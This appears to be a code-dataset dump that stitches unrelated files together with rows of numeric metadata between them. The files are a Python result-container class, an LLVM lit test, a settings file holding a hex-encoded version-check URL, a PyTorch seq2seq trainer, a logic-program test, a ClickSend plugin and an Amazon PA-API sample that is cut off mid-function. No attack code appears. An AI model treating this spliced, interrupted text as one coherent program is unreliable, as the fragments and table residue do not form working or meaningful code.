    def __lt__(self, other):
        """Order :class:`PercentExceedance` instances by time index."""
        if not isinstance(other, PercentExceedance):
            raise TypeError(
                f"< not supported between instances of {PercentExceedance} and"\
                f" {type(other)}")
        # BUG FIX: the original read `self.same_geometry` without calling
        # it, so the geometry-mismatch check was silently skipped; call it
        # like the sibling container classes do.
        self.same_geometry(other)
        return self.index < other.index

    @property
    def string(self):
        """:obj:`str` : The string representation of the result.
        """
        rv = str()
        # NOTE(review): a time index of 0 is falsy and therefore rendered
        # as "None" here and in `row`/`valid` — confirm upstream never
        # reports an exceedance at the very first time step.
        if self.index:
            t = self.domain.time[self.index]
            rv += f"id: {self.id}\n"
            rv += f"time: {t:.2f}{self.units.time}\n\n"
        else:
            rv += "None\n\n"
        return rv

    @property
    def header(self):
        """:obj:`list` [:obj:`str`] : The list of headers for a csv output.
        """
        return [
            "id",
            f"time ({self.units.time})",
        ]

    @property
    def row(self):
        """:obj:`list` [:obj:`float`] : The list of values for a csv output.
        """
        if self.index:
            t = self.domain.time[self.index]
            return [self.id, t]
        else:
            return [self.id, "None"]

    @property
    def fname(self):
        """:obj:`str` : the file name for the this result output.
        """
        return f"{self.percent}%_of_{self.geometry}_exceeds_{self.threshold}{self.unit}.csv"

    @property
    def title(self):
        """:obj:`str` : the title string for this result.
        """
        return f"{self.percent}% Threshold Exceedance"

    @property
    def extreme_title(self):
        """:obj:`str` : the extremum version of the title for this result.
        """
        return f"Minimum time to {self.threshold}{self.unit} for "\
               f"{self.percent}% of domain for {self.geometry}:"

    @property
    def valid(self):
        """:obj:`bool` : Returns true if contains valid index, else false.
        """
        return bool(self.index)
class MaxPercentExceedance(ResultContainer):
    """Result container for the max percent threshold exceedance in a domain.

    Attributes
    ----------
    index : :obj:`int`
        The time index in the array where the exceedance occurred.
    threshold : :obj:`float`
        The threshold that was exceeded.
    value : :obj:`float`
        The percentage by which the threshold was exceeded
    """
    def __init__(self,
                 setting: RIDTConfig,
                 geometry: str,
                 id: str,
                 quantity: str,
                 value: float,
                 index: int,
                 threshold: float):
        """The MaxPercentExceedance class initialiser

        (The original docstring was copy-pasted from PercentExceedance
        and named the wrong class.)

        Parameters
        ----------
        setting : :class:`~.RIDTConfig`
            The settings for the run in question.
        geometry : :obj:`str`
            The geometry domain this result corresponds to.
        id : :obj:`str`
            The id of the domain this result corresponds to.
        quantity : :obj:`str`
            The string id for the quantity stored in the data store.
        index : :obj:`int`
            The time index in the array where the exceedance occurred.
        threshold : :obj:`float`
            The threshold that was exceeded.
        value : :obj:`float`
            The percentage by which the threshold was exceeded
        """
        super().__init__(setting, geometry, id, quantity)
        self.threshold = threshold
        self.index = index
        self.value = value

    def __lt__(self, other):
        """Order :class:`MaxPercentExceedance` instances by :attr:`value`."""
        if not isinstance(other, MaxPercentExceedance):
            raise TypeError(
                f"< not supported between instances of {MaxPercentExceedance} and {type(other)}")
        self.same_geometry(other)
        return self.value < other.value

    @property
    def string(self):
        """:obj:`str` : The string representation of the result.
        """
        rv = str()
        if self.index:
            t = self.domain.time[self.index]
            rv += f"id: {self.id}\n"
            rv += f"time: {t:.2f}{self.units.time}\n"
            rv += f"value: {self.value:.2f}%\n\n"
        else:
            rv += "None\n\n"
        return rv

    @property
    def header(self):
        """:obj:`list` [:obj:`str`] : The list of headers for a csv output.
        """
        return [
            "id",
            f"time ({self.units.time})",
            # Plain literal: the original was an f-string with no
            # placeholders (flagged by linters as F541).
            "value (%)"
        ]

    @property
    def row(self):
        """:obj:`list` [:obj:`float`] : The list of values for a csv output.
        """
        if self.index:
            t = self.domain.time[self.index]
            return [self.id, t, self.value]
        else:
            return [self.id, "None", "None"]

    @property
    def fname(self):
        """:obj:`str` : the file name for the this result output.
        """
        return f"{self.geometry}_max%_exceeds_{self.threshold}{self.unit}.csv"

    @property
    def title(self):
        """:obj:`str` : the title string for this result.
        """
        return "Maximum % Threshold Exceedance"

    @property
    def extreme_title(self):
        """:obj:`str` : the extremum version of the title for this result.
        """
        return f"Maximum percentage exceeding {self.threshold}{self.unit} "\
               f"for {self.geometry}:"

    @property
    def valid(self):
        """:obj:`bool` : Returns true if contains valid index, else false.
        """
        return bool(self.index)
| 27.871972
| 92
| 0.53023
| 1,856
| 16,110
| 4.563039
| 0.075431
| 0.025505
| 0.038257
| 0.026095
| 0.855355
| 0.838352
| 0.820522
| 0.806235
| 0.767269
| 0.767269
| 0
| 0.001333
| 0.347921
| 16,110
| 577
| 93
| 27.920277
| 0.804855
| 0.371633
| 0
| 0.713725
| 0
| 0.003922
| 0.194324
| 0.072387
| 0
| 0
| 0
| 0
| 0
| 1
| 0.152941
| false
| 0
| 0.015686
| 0
| 0.337255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4357fe88f905f13a8c5fedb3f6348b6bb51be65b
| 1,625
|
py
|
Python
|
llvm/utils/lit/tests/test-output-micro.py
|
medismailben/llvm-project
|
e334a839032fe500c3bba22bf976ab7af13ce1c1
|
[
"Apache-2.0"
] | 4,812
|
2015-01-02T19:38:10.000Z
|
2022-03-27T12:42:24.000Z
|
llvm/utils/lit/tests/test-output-micro.py
|
medismailben/llvm-project
|
e334a839032fe500c3bba22bf976ab7af13ce1c1
|
[
"Apache-2.0"
] | 11,789
|
2015-01-05T04:50:15.000Z
|
2022-03-31T23:39:19.000Z
|
llvm/utils/lit/tests/test-output-micro.py
|
medismailben/llvm-project
|
e334a839032fe500c3bba22bf976ab7af13ce1c1
|
[
"Apache-2.0"
] | 2,543
|
2015-01-01T11:18:36.000Z
|
2022-03-22T21:32:36.000Z
|
# RUN: %{lit} -j 1 -v %{inputs}/test-data-micro --output %t.results.out
# RUN: FileCheck < %t.results.out %s
# RUN: rm %t.results.out
# CHECK: {
# CHECK: "__version__"
# CHECK: "elapsed"
# CHECK-NEXT: "tests": [
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": null,
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "micro_value0": 4,
# CHECK-NEXT: "micro_value1": 1.3
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini:test{{[0-2]}}",
# CHECK-NEXT: "output": ""
# CHECK-NEXT: },
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": null,
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "micro_value0": 4,
# CHECK-NEXT: "micro_value1": 1.3
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini:test{{[0-2]}}",
# CHECK-NEXT: "output": ""
# CHECK-NEXT: },
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": null,
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "micro_value0": 4,
# CHECK-NEXT: "micro_value1": 1.3
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini:test{{[0-2]}}",
# CHECK-NEXT: "output": ""
# CHECK-NEXT: },
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": {{[0-9.]+}},
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "value0": 1,
# CHECK-NEXT: "value1": 2.3456
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini",
# CHECK-NEXT: "output": "Test passed."
# CHECK-NEXT: }
# CHECK-NEXT: ]
# CHECK-NEXT: }
| 31.25
| 77
| 0.543385
| 206
| 1,625
| 4.237864
| 0.174757
| 0.443299
| 0.208477
| 0.268041
| 0.791523
| 0.762887
| 0.731959
| 0.731959
| 0.731959
| 0.731959
| 0
| 0.025237
| 0.219692
| 1,625
| 51
| 78
| 31.862745
| 0.663249
| 0.937846
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
43a10915fae45a0c83b8e8c1f94f59417abb696a
| 75
|
py
|
Python
|
app/settings.py
|
Annihilator708/ORMit
|
83602ac16322168cb81c072d228abd82cc27f1c2
|
[
"MIT"
] | null | null | null |
app/settings.py
|
Annihilator708/ORMit
|
83602ac16322168cb81c072d228abd82cc27f1c2
|
[
"MIT"
] | null | null | null |
app/settings.py
|
Annihilator708/ORMit
|
83602ac16322168cb81c072d228abd82cc27f1c2
|
[
"MIT"
] | null | null | null |
VAPI = b'7777772e636f6465776172732e6e6c2f76657273696f6e64617461l302e312e30'
| 75
| 75
| 0.933333
| 3
| 75
| 23.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.739726
| 0.026667
| 75
| 1
| 75
| 75
| 0.219178
| 0
| 0
| 0
| 0
| 0
| 0.855263
| 0.855263
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43d2a1f869e22dac7b3a9e88186f84a24471d47a
| 14,005
|
py
|
Python
|
src/python/torch/seq2seq_train.py
|
FAIR-UMN/fair_ecal_monitoring
|
bbbf55451111162c419d414c50367d153a544754
|
[
"MIT"
] | null | null | null |
src/python/torch/seq2seq_train.py
|
FAIR-UMN/fair_ecal_monitoring
|
bbbf55451111162c419d414c50367d153a544754
|
[
"MIT"
] | null | null | null |
src/python/torch/seq2seq_train.py
|
FAIR-UMN/fair_ecal_monitoring
|
bbbf55451111162c419d414c50367d153a544754
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
from torch import optim
import numpy as np
import random
from util import *
class Seq2Seq_Train:
    """Train an encoder/decoder (seq2seq) pair on windowed time-series data.

    The input/target tensors are indexed as (time step, sample, feature).
    Target feature 0 is an exogenous input ("luminosity delta") that is
    concatenated to the decoder's input at every step; the remaining target
    features ("calibration") are the values the decoder must predict.

    Supported training strategies (selected via ``strategy``):
      - ``'recursive'``:       the decoder always consumes its own prediction.
      - ``'teacher_forcing'``: one coin flip per batch decides between
                               ground-truth inputs and fully recursive decoding.
      - ``'mixed'``:           the coin is flipped at every time step.
    """

    def __init__(self,
                 encoder,
                 decoder,
                 input_tensor,
                 target_tensor,
                 n_epochs,
                 target_len,
                 batch_size,
                 learning_rate=0.01,
                 opt_alg='adam',
                 print_step=1,
                 strategy='recursive',
                 teacher_forcing_ratio=0.5,
                 device='cpu',
                 loss_figure_name='loss.png'):
        self.encoder = encoder
        self.decoder = decoder
        self.input_tensor = input_tensor
        self.target_tensor = target_tensor
        self.n_epochs = n_epochs
        self.target_len = target_len
        self.batch_size = batch_size
        self.learning_rate = learning_rate
        self.opt_alg = opt_alg
        self.print_step = print_step
        self.strategy = strategy
        self.teacher_forcing_ratio = teacher_forcing_ratio
        self.device = device
        self.loss_figure_name = loss_figure_name

    def start_train(self):
        """Dispatch to the training loop selected by ``self.strategy``."""
        print('>>> Start training... (be patient: training time varies)')
        if self.strategy == 'recursive':
            self.train_model_recursive()
        elif self.strategy == 'teacher_forcing':
            self.train_model_teacher_forcing()
        elif self.strategy == 'mixed':
            self.train_model_mixed()
        else:
            assert False, "Please select one of them---[recursive, teacher_forcing, mixed]!"
        print('>>> Finish training!')

    # ------------------------------------------------------------------
    # public strategy entry points (interface preserved)
    # ------------------------------------------------------------------
    def train_model_recursive(self):
        """Train with the decoder always feeding on its own predictions."""
        self._run_training(self._decode_recursive)

    def train_model_teacher_forcing(self):
        """Train with a per-batch coin flip: teacher forcing vs. recursion."""
        self._run_training(self._decode_teacher_forcing)

    def train_model_mixed(self):
        """Train with a per-step coin flip: teacher forcing vs. recursion."""
        self._run_training(self._decode_mixed)

    # ------------------------------------------------------------------
    # private helpers
    # ------------------------------------------------------------------
    def _build_optimizer(self, params):
        """Return the optimizer named by ``self.opt_alg`` (case-insensitive).

        BUG FIX: the original teacher_forcing/mixed paths compared the *bound
        method* ``self.opt_alg.upper`` (never called) against the strings, so
        both comparisons were always False; and because the SGD check was an
        ``if`` rather than ``elif``, even selecting ADAM fell through to the
        assert. Centralizing the choice here fixes both paths.
        """
        alg = self.opt_alg.upper()
        if alg == 'ADAM':
            return optim.Adam(params=params, lr=self.learning_rate)
        elif alg == 'SGD':
            return optim.SGD(params=params, lr=self.learning_rate)
        else:
            assert False, 'This version only supports ADAM and SGD!'

    def _decode_recursive(self, outputs, decoder_input, decoder_hidden,
                          target_batch, target_batch_input):
        """Predict step by step, feeding each prediction back as input."""
        for t in range(self.target_len):
            decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
            outputs[t] = decoder_output
            # Re-attach the exogenous feature before the next step.
            lumi_feature = target_batch_input[t, :, :]
            decoder_input = torch.cat((lumi_feature, decoder_output), dim=1)

    def _decode_teacher_forcing(self, outputs, decoder_input, decoder_hidden,
                                target_batch, target_batch_input):
        """One coin flip per batch: ground-truth inputs or fully recursive."""
        if random.random() < self.teacher_forcing_ratio:
            for t in range(self.target_len):
                decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
                outputs[t] = decoder_output
                # Feed the ground truth (plus the exogenous feature) back in.
                lumi_feature = target_batch_input[t, :, :]
                decoder_input = torch.cat((lumi_feature, target_batch[t, :, :]), dim=1)
        else:
            self._decode_recursive(outputs, decoder_input, decoder_hidden,
                                   target_batch, target_batch_input)

    def _decode_mixed(self, outputs, decoder_input, decoder_hidden,
                      target_batch, target_batch_input):
        """One coin flip per time step: ground truth or own prediction."""
        for t in range(self.target_len):
            decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
            outputs[t] = decoder_output
            lumi_feature = target_batch_input[t, :, :]
            if random.random() < self.teacher_forcing_ratio:
                decoder_input = torch.cat((lumi_feature, target_batch[t, :, :]), dim=1)
            else:
                decoder_input = torch.cat((lumi_feature, decoder_output), dim=1)

    def _run_training(self, decode_batch):
        """Shared epoch/batch loop; ``decode_batch`` fills the outputs tensor.

        The three public strategies differ only in how the decoder is stepped,
        so the optimizer setup, batching, loss computation, backprop, and loss
        reporting live here once instead of three times.
        """
        self.encoder.to(self.device)
        self.decoder.to(self.device)
        # Optimize encoder and decoder parameters jointly.
        params = list(self.encoder.parameters()) + list(self.decoder.parameters())
        optimizer = self._build_optimizer(params)
        criterion = nn.MSELoss()
        # NOTE(review): the batch index below advances by 1, not by
        # batch_size, so consecutive windows overlap heavily and only the
        # first n_batches start positions are used -- kept exactly as in the
        # original; confirm this windowing is intended.
        n_batches = int(self.input_tensor.shape[1] / self.batch_size)
        losses = []
        for epoch in range(self.n_epochs):
            self.encoder.train()
            self.decoder.train()
            batch_loss = []
            for batch in range(n_batches):
                input_batch = self.input_tensor[:, batch: batch + self.batch_size, :].to(self.device)
                # Feature 0 is the exogenous "luminosity delta" given to the decoder.
                target_batch_input = self.target_tensor[:, batch: batch + self.batch_size, 0:1].to(self.device)
                # Remaining features are the real prediction target ("calibration").
                target_batch = self.target_tensor[:, batch: batch + self.batch_size, 1:].to(self.device)
                # Buffer for the decoder predictions, filled step by step.
                outputs = torch.zeros(self.target_len, self.batch_size, target_batch.shape[2])
                optimizer.zero_grad()
                encoder_output, encoder_hidden = self.encoder(input_batch)
                # Seed the decoder with the last observed input step.
                decoder_input = input_batch[-1, :, :]  # shape: (batch_size, input_size)
                decoder_hidden = encoder_hidden
                decode_batch(outputs, decoder_input, decoder_hidden,
                             target_batch, target_batch_input)
                outputs = outputs.to(self.device)
                loss = criterion(outputs, target_batch)
                batch_loss.append(loss.item())
                loss.backward()
                optimizer.step()
            losses.append(np.mean(batch_loss))
            # Save/plot the loss curve every print_step epochs.
            if epoch % self.print_step == 0:
                plot_loss(losses, self.loss_figure_name)
                show_loss(losses)
| 39.786932
| 100
| 0.558586
| 1,522
| 14,005
| 4.936925
| 0.103811
| 0.058557
| 0.028746
| 0.023955
| 0.867581
| 0.864653
| 0.864653
| 0.864653
| 0.864653
| 0.851078
| 0
| 0.003655
| 0.355302
| 14,005
| 352
| 101
| 39.786932
| 0.828552
| 0.191503
| 0
| 0.746269
| 0
| 0
| 0.029856
| 0
| 0
| 0
| 0
| 0
| 0.019901
| 1
| 0.024876
| false
| 0
| 0.029851
| 0
| 0.059701
| 0.034826
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
605fcce62e2c61d1583551fb992c3db61567260f
| 213
|
py
|
Python
|
tests/parser/wellfounded.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
win( X ) :- move( X, Y ), not win( Y ).
move( a, d ).
move( b, c ).
move( c, b ).
"""
output = """
win( X ) :- move( X, Y ), not win( Y ).
move( a, d ).
move( b, c ).
move( c, b ).
"""
| 12.529412
| 40
| 0.380282
| 36
| 213
| 2.25
| 0.305556
| 0.098765
| 0.197531
| 0.222222
| 0.864198
| 0.864198
| 0.864198
| 0.864198
| 0.864198
| 0.864198
| 0
| 0
| 0.338028
| 213
| 16
| 41
| 13.3125
| 0.574468
| 0
| 0
| 0.833333
| 0
| 0
| 0.845771
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
607628f8ea875bbe76185742f08de5fd781c848b
| 1,315
|
py
|
Python
|
clicksend.py
|
z1pti3/jimiPlugin-clicksend
|
f635aac09c2e12d6456fa1ceea1f4b88199c4e29
|
[
"Apache-2.0"
] | 1
|
2021-07-26T15:02:38.000Z
|
2021-07-26T15:02:38.000Z
|
clicksend.py
|
z1pti3/jimiPlugin-clicksend
|
f635aac09c2e12d6456fa1ceea1f4b88199c4e29
|
[
"Apache-2.0"
] | null | null | null |
clicksend.py
|
z1pti3/jimiPlugin-clicksend
|
f635aac09c2e12d6456fa1ceea1f4b88199c4e29
|
[
"Apache-2.0"
] | null | null | null |
import jimi
class _clicksend(jimi.plugin._plugin):
    """Clicksend plugin: registers and deregisters its action models."""

    version = 0.1

    # (model name, model class) pairs contributed by this plugin; install and
    # uninstall walk this table so the two lists can never drift apart.
    _model_table = [
        ("clicksendSMS", "_clicksendSMS"),
        ("clicksendPullUnreadSMS", "_clicksendPullUnreadSMS"),
        ("clicksendGetAccountUsage", "_clicksendGetAccountUsage"),
        ("clicksendGetAccountInfo", "_clicksendGetAccountInfo"),
    ]

    def install(self):
        # Register every action model provided by the plugin.
        for model_name, model_class in self._model_table:
            jimi.model.registerModel(model_name, model_class, "_action", "plugins.clicksend.models.action")
        return True

    def uninstall(self):
        # Deregister the same models, in the same order.
        for model_name, model_class in self._model_table:
            jimi.model.deregisterModel(model_name, model_class, "_action", "plugins.clicksend.models.action")
        return True

    def upgrade(self, LatestPluginVersion):
        # No migrations defined for this version.
        pass
| 52.6
| 134
| 0.744487
| 114
| 1,315
| 8.429825
| 0.27193
| 0.074922
| 0.183143
| 0.233091
| 0.790843
| 0.790843
| 0.790843
| 0.790843
| 0.703434
| 0.193548
| 0
| 0.003487
| 0.127757
| 1,315
| 24
| 135
| 54.791667
| 0.83435
| 0.041825
| 0
| 0.117647
| 0
| 0
| 0.506369
| 0.421975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0.058824
| 0.058824
| 0
| 0.470588
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
608cc7c119405bc22f92b4a94114011c611d50ed
| 13,886
|
py
|
Python
|
sample_search_items_api.py
|
Peekaboo0/paapi5-python
|
a591a63b2e48bbdf50e569031a63ffd6e29da9bd
|
[
"Apache-2.0"
] | null | null | null |
sample_search_items_api.py
|
Peekaboo0/paapi5-python
|
a591a63b2e48bbdf50e569031a63ffd6e29da9bd
|
[
"Apache-2.0"
] | null | null | null |
sample_search_items_api.py
|
Peekaboo0/paapi5-python
|
a591a63b2e48bbdf50e569031a63ffd6e29da9bd
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License").
You may not use this file except in compliance with the License.
A copy of the License is located at
http://www.apache.org/licenses/LICENSE-2.0
or in the "license" file accompanying this file. This file is distributed
on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the License for the specific language governing
permissions and limitations under the License.
"""
"""
ProductAdvertisingAPI
https://webservices.amazon.com/paapi5/documentation/index.html
"""
"""
This sample code snippet is for ProductAdvertisingAPI 5.0's SearchItems API
For more details, refer:
https://webservices.amazon.com/paapi5/documentation/search-items.html
"""
from paapi5_python_sdk.api.default_api import DefaultApi
from paapi5_python_sdk.models.partner_type import PartnerType
from paapi5_python_sdk.models.search_items_request import SearchItemsRequest
from paapi5_python_sdk.models.search_items_resource import SearchItemsResource
from paapi5_python_sdk.rest import ApiException
def search_items():
    """Call the PA-API 5.0 SearchItems operation synchronously and print the result."""
    # --- Credentials --------------------------------------------------
    # Please add your access key here.
    access_key = "<YOUR ACCESS KEY>"
    # Please add your secret key here.
    secret_key = "<YOUR SECRET KEY>"
    # Please add your partner tag (store/tracking id) here.
    partner_tag = "<YOUR PARTNER TAG>"

    # PAAPI host and region to which the request is sent; for details see:
    # https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region
    host = "webservices.amazon.com"
    region = "us-east-1"

    # API declaration.
    default_api = DefaultApi(
        access_key=access_key, secret_key=secret_key, host=host, region=region
    )

    # Request initialization: keywords to search for.
    keywords = "Harry Potter"
    # Category (search index) in which the search is made; see:
    # https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html
    search_index = "All"
    # Number of items to return in the search result.
    item_count = 1
    # Resources to request, chosen from the SearchItemsResource enum; see:
    # https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter
    search_items_resource = [
        SearchItemsResource.ITEMINFO_TITLE,
        SearchItemsResource.OFFERS_LISTINGS_PRICE,
    ]

    # Forming the request object.
    try:
        search_items_request = SearchItemsRequest(
            partner_tag=partner_tag,
            partner_type=PartnerType.ASSOCIATES,
            keywords=keywords,
            search_index=search_index,
            item_count=item_count,
            resources=search_items_resource,
        )
    except ValueError as exception:
        print("Error in forming SearchItemsRequest: ", exception)
        return

    try:
        # Sending the request.
        response = default_api.search_items(search_items_request)
        print("API called Successfully")
        print("Complete Response:", response)

        # Parse the response: dump the first returned item, guarding every
        # optional attribute against None.
        if response.search_result is not None:
            print("Printing first item information in SearchResult:")
            item_0 = response.search_result.items[0]
            if item_0 is not None:
                if item_0.asin is not None:
                    print("ASIN: ", item_0.asin)
                if item_0.detail_page_url is not None:
                    print("DetailPageURL: ", item_0.detail_page_url)
                info = item_0.item_info
                if info is not None and info.title is not None and info.title.display_value is not None:
                    print("Title: ", item_0.item_info.title.display_value)
                listings = item_0.offers.listings if item_0.offers is not None else None
                if (listings is not None
                        and listings[0].price is not None
                        and listings[0].price.display_amount is not None):
                    print(
                        "Buying Price: ", item_0.offers.listings[0].price.display_amount
                    )
        if response.errors is not None:
            print("\nPrinting Errors:\nPrinting First Error Object from list of Errors")
            print("Error code", response.errors[0].code)
            print("Error message", response.errors[0].message)
    except ApiException as exception:
        print("Error calling PA-API 5.0!")
        print("Status code:", exception.status)
        print("Errors :", exception.body)
        print("Request ID:", exception.headers["x-amzn-RequestId"])
    except TypeError as exception:
        print("TypeError :", exception)
    except ValueError as exception:
        print("ValueError :", exception)
    except Exception as exception:
        print("Exception :", exception)
def search_items_with_http_info():
    """Call SearchItems and also dump the raw HTTP response information."""
    # --- Credentials --------------------------------------------------
    # Please add your access key here.
    access_key = "<YOUR ACCESS KEY>"
    # Please add your secret key here.
    secret_key = "<YOUR SECRET KEY>"
    # Please add your partner tag (store/tracking id) here.
    partner_tag = "<YOUR PARTNER TAG>"

    # PAAPI host and region to which the request is sent; for details see:
    # https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region
    host = "webservices.amazon.com"
    region = "us-east-1"

    # API declaration.
    default_api = DefaultApi(
        access_key=access_key, secret_key=secret_key, host=host, region=region
    )

    # Request initialization: keywords to search for.
    keywords = "Harry Potter"
    # Category (search index) in which the search is made; see:
    # https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html
    search_index = "All"
    # Number of items to return in the search result.
    item_count = 1
    # Resources to request, chosen from the SearchItemsResource enum; see:
    # https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter
    search_items_resource = [
        SearchItemsResource.ITEMINFO_TITLE,
        SearchItemsResource.OFFERS_LISTINGS_PRICE,
    ]

    # Forming the request object.
    try:
        search_items_request = SearchItemsRequest(
            partner_tag=partner_tag,
            partner_type=PartnerType.ASSOCIATES,
            keywords=keywords,
            search_index=search_index,
            item_count=item_count,
            resources=search_items_resource,
        )
    except ValueError as exception:
        print("Error in forming SearchItemsRequest: ", exception)
        return

    try:
        # Sending the request. The *_with_http_info variant returns an
        # indexable result: element 0 is the parsed response, element 2 the
        # HTTP info (presumably headers/status -- see SDK docs).
        response_with_http_info = default_api.search_items_with_http_info(
            search_items_request
        )

        # Parse the response, guarding every optional attribute against None.
        if response_with_http_info is not None:
            print("API called Successfully")
            print("Complete Response Dump:", response_with_http_info)
            print("HTTP Info:", response_with_http_info[2])
            response = response_with_http_info[0]
            if response.search_result is not None:
                print("Printing first item information in SearchResult:")
                item_0 = response.search_result.items[0]
                if item_0 is not None:
                    if item_0.asin is not None:
                        print("ASIN: ", item_0.asin)
                    if item_0.detail_page_url is not None:
                        print("DetailPageURL: ", item_0.detail_page_url)
                    info = item_0.item_info
                    if info is not None and info.title is not None and info.title.display_value is not None:
                        print("Title: ", item_0.item_info.title.display_value)
                    listings = item_0.offers.listings if item_0.offers is not None else None
                    if (listings is not None
                            and listings[0].price is not None
                            and listings[0].price.display_amount is not None):
                        print(
                            "Buying Price: ",
                            item_0.offers.listings[0].price.display_amount,
                        )
            if response.errors is not None:
                print(
                    "\nPrinting Errors:\nPrinting First Error Object from list of Errors"
                )
                print("Error code", response.errors[0].code)
                print("Error message", response.errors[0].message)
    except ApiException as exception:
        print("Error calling PA-API 5.0!")
        print("Status code:", exception.status)
        print("Errors :", exception.body)
        print("Request ID:", exception.headers["x-amzn-RequestId"])
    except TypeError as exception:
        print("TypeError :", exception)
    except ValueError as exception:
        print("ValueError :", exception)
    except Exception as exception:
        print("Exception :", exception)
def search_items_async():
    """Call SearchItems asynchronously (async_req=True) and print the result."""
    # --- Credentials --------------------------------------------------
    # Please add your access key here.
    access_key = "<YOUR ACCESS KEY>"
    # Please add your secret key here.
    secret_key = "<YOUR SECRET KEY>"
    # Please add your partner tag (store/tracking id) here.
    partner_tag = "<YOUR PARTNER TAG>"

    # PAAPI host and region to which the request is sent; for details see:
    # https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region
    host = "webservices.amazon.com"
    region = "us-east-1"

    # API declaration.
    default_api = DefaultApi(
        access_key=access_key, secret_key=secret_key, host=host, region=region
    )

    # Request initialization: keywords to search for.
    keywords = "Harry Potter"
    # Category (search index) in which the search is made; see:
    # https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html
    search_index = "All"
    # Number of items to return in the search result.
    item_count = 1
    # Resources to request, chosen from the SearchItemsResource enum; see:
    # https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter
    search_items_resource = [
        SearchItemsResource.ITEMINFO_TITLE,
        SearchItemsResource.OFFERS_LISTINGS_PRICE,
    ]

    # Forming the request object.
    try:
        search_items_request = SearchItemsRequest(
            partner_tag=partner_tag,
            partner_type=PartnerType.ASSOCIATES,
            keywords=keywords,
            search_index=search_index,
            item_count=item_count,
            resources=search_items_resource,
        )
